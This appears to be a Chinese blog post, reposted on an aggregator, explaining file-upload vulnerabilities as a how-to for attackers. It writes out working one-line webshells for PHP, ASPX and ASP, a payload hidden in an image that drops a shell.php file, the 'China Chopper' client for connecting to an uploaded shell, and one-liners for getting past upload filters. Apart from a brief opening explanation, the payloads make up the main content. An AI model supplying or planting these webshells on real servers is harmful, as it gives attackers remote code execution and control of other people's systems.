首页 > Web开发 > 详细

文件上传漏洞详解

时间:2020-02-03 09:37:00      阅读:77      评论:0      收藏:0      [点我收藏+]

网站图片、文件上传功能漏洞笔记

文件上传漏洞之程序员未对上传的文件进行严格的上传和过滤,导致用户可以利用上传功能向服务器上传木马、病毒、恶意脚本、webshell等。“文件上传”本身没有问题,有问题是文件上传后服务器的处理和解析逻辑。

制作脚本文件上传至web服务器

  制作脚本文件(制作相关语言文件)

  php:   <?php @eval($_POST[‘pass‘]);?> 

  aspx:   <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 

  asp:    <%eval request ("pass")%> 

  制作图片木马

  利用Edjpgcom软件直接将语句插入,或者利用cmd命令将脚本文件和图片相结合

  Edjpgcomr图片插入语句 <?fputs(fopen("shell.php","w"),<?php @eval($_POST[‘pass‘]);?>)?> 

  利用文件包含解析漏洞让服务器对图片进行解析,在服务器端生成脚本文件。

 

利用“中国菜刀”软件进行连接脚本文件

  软件中的配置框中可以进行数据库配置连接  

  技术分享图片

 

 

脚本绕过防火墙

  具体是后端上传文件过滤语句不完善导致,文件后缀过滤、大小过滤、文件类型过滤、文件内容过滤等。

  例如:利用BURPSUITE软件挂代理进行文件信息修改。改变脚本文件内容进行(<?php echo `$_GET[‘r‘]` ?>//绕过<?限制的一句话、<script language="php">@eval_r($_POST[sb])</script>//绕过<?php ?>限制的一句话)

 

文件上传漏洞详解

原文:https://www.cnblogs.com/Dpkg/p/12254524.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!